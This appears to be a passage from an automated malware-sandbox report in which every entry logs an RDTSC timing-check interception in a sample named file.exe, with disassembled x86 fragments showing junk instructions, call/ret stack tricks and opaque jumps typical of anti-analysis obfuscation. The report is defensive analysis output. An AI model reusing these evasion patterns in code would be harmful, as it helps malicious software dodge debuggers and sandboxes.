                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 493279 second address: 49327D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49327D second address: 493286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 493286 second address: 49328B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48F1BB second address: 48F1BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48F1BF second address: 48F1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48F1C5 second address: 48F1D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49CDAB57Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491D0F second address: 491D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FA49D1B33CEh 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498731 second address: 498736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490795 second address: 49079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498736 second address: 498757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB582h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FA49CDAB580h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49079D second address: 4907A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498757 second address: 4987B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FA49CDAB578h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FA49CDAB578h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov ebx, 3DEE427Ah 0x00000042 push 00000000h 0x00000044 clc 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 jno 00007FA49CDAB576h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49676E second address: 496807 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007FA49D1B33C6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FA49D1B33C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov edi, 734E6026h 0x0000002c and di, 1007h 0x00000031 push dword ptr fs:[00000000h] 0x00000038 sub dword ptr [ebp+122D315Fh], esi 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 jmp 00007FA49D1B33CAh 0x0000004a mov eax, dword ptr [ebp+122D0B8Dh] 0x00000050 or edi, 76A772A1h 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push ecx 0x0000005b call 00007FA49D1B33C8h 0x00000060 pop ecx 0x00000061 mov dword ptr [esp+04h], ecx 0x00000065 add dword ptr [esp+04h], 0000001Ch 0x0000006d inc ecx 0x0000006e push ecx 0x0000006f ret 0x00000070 pop ecx 0x00000071 ret 0x00000072 or dword ptr [ebp+122D304Bh], eax 0x00000078 nop 0x00000079 push edi 0x0000007a pushad 0x0000007b pushad 0x0000007c popad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4978F2 second address: 4978F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4978F7 second address: 4978FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499883 second address: 49988A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A850 second address: 49A85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B794 second address: 49B7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB580h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FA49CDAB578h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a add bx, 7602h 0x0000002f push eax 0x00000030 push edi 0x00000031 push eax 0x00000032 push edx 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D719 second address: 49D71F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E75E second address: 49E7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB580h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FA49CDAB578h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov edi, edx 0x00000028 push 00000000h 0x0000002a mov ebx, dword ptr [ebp+122D3169h] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007FA49CDAB578h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c mov bl, C4h 0x0000004e js 00007FA49CDAB577h 0x00000054 cmc 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FA49CDAB57Ch 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E7DF second address: 49E7E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E7E5 second address: 49E7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E7E9 second address: 49E7FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FA49D1B33C6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E7FB second address: 49E7FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F8BE second address: 49F8C8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA49D1B33C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498A3B second address: 498A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007FA49CDAB588h 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FA49CDAB576h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498A51 second address: 498A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AAB0 second address: 49AAB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D8ED second address: 49D90B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnc 00007FA49D1B33C6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E9CA second address: 49E9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FA49CDAB57Ch 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F9F2 second address: 49F9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1A78 second address: 4A1AA2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA49CDAB57Bh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e jmp 00007FA49CDAB584h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1AA2 second address: 4A1B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 nop 0x00000007 mov bx, si 0x0000000a add dword ptr [ebp+122D3097h], edi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov edi, dword ptr [ebp+1247052Ah] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007FA49D1B33C8h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e and edi, 7C20EA1Ch 0x00000044 mov eax, dword ptr [ebp+122D0B59h] 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007FA49D1B33C8h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 00000017h 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 jmp 00007FA49D1B33D9h 0x00000069 push FFFFFFFFh 0x0000006b sub bx, D3C5h 0x00000070 push eax 0x00000071 js 00007FA49D1B33D2h 0x00000077 jo 00007FA49D1B33CCh 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2A3D second address: 4A2A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ACFDA second address: 4ACFF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ACFF4 second address: 4ACFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD135 second address: 4AD140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA49D1B33C6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD140 second address: 4AD14F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jp 00007FA49CDAB576h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD3F7 second address: 4AD3FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AFDEC second address: 4AFE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA49CDAB57Dh 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FA49CDAB57Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AFE0B second address: 4AFE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA49D1B33CEh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4108 second address: 4B410F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B78A5 second address: 4B78AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B78AB second address: 4B78DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA49CDAB576h 0x0000000a jp 00007FA49CDAB576h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FA49CDAB581h 0x00000017 jmp 00007FA49CDAB57Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B83BD second address: 4B83C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B83C1 second address: 4B83CB instructions: 0x00000000 rdtsc 0x00000002 js 00007FA49CDAB576h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B8671 second address: 4B8675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B87D9 second address: 4B87DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A388F second address: 4A3894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3894 second address: 4A3899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3899 second address: 4A389F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A389F second address: 4A38B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jp 00007FA49CDAB584h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A38B0 second address: 4A38B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B8914 second address: 4B891A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45135E second address: 451364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 451364 second address: 451378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007FA49CDAB576h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE4D5 second address: 4BE4DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD391 second address: 4BD39F instructions: 0x00000000 rdtsc 0x00000002 js 00007FA49CDAB576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48972D second address: 489744 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA49D1B33C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jnp 00007FA49D1B33C6h 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489744 second address: 4897A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB588h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FA49CDAB578h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+1247B490h] 0x0000002a jc 00007FA49CDAB57Ch 0x00000030 mov edx, dword ptr [ebp+122D252Fh] 0x00000036 mov dx, 3000h 0x0000003a push eax 0x0000003b jbe 00007FA49CDAB582h 0x00000041 je 00007FA49CDAB57Ch 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489F6C second address: 489F7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489FDA second address: 489FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489FDE second address: 489FF0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA49D1B33C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FA49D1B33C6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489FF0 second address: 48A008 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA49CDAB576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e jnl 00007FA49CDAB576h 0x00000014 pop ebx 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A0FC second address: 48A100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A100 second address: 48A188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA49CDAB57Ch 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FA49CDAB578h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a add edx, 1CD8BC99h 0x00000030 push 00000004h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007FA49CDAB578h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c pushad 0x0000004d jmp 00007FA49CDAB57Bh 0x00000052 jno 00007FA49CDAB57Ch 0x00000058 popad 0x00000059 xor edx, 5CDF4436h 0x0000005f nop 0x00000060 push esi 0x00000061 je 00007FA49CDAB57Ch 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A53B second address: 48A541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A66C second address: 48A67F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007FA49CDAB588h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A67F second address: 48A683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A86A second address: 48A86E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A86E second address: 48A888 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47281D second address: 472821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 472821 second address: 472855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA49D1B33D6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD6AA second address: 4BD6B4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA49CDAB57Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDBE8 second address: 4BDBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDBEE second address: 4BDC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49CDAB57Dh 0x00000009 popad 0x0000000a push esi 0x0000000b jo 00007FA49CDAB576h 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDD9A second address: 4BDDA8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA49D1B33C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDDA8 second address: 4BDDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDDAC second address: 4BDDB8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA49D1B33C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDDB8 second address: 4BDDBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDDBE second address: 4BDDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE04B second address: 4BE051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE051 second address: 4BE055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
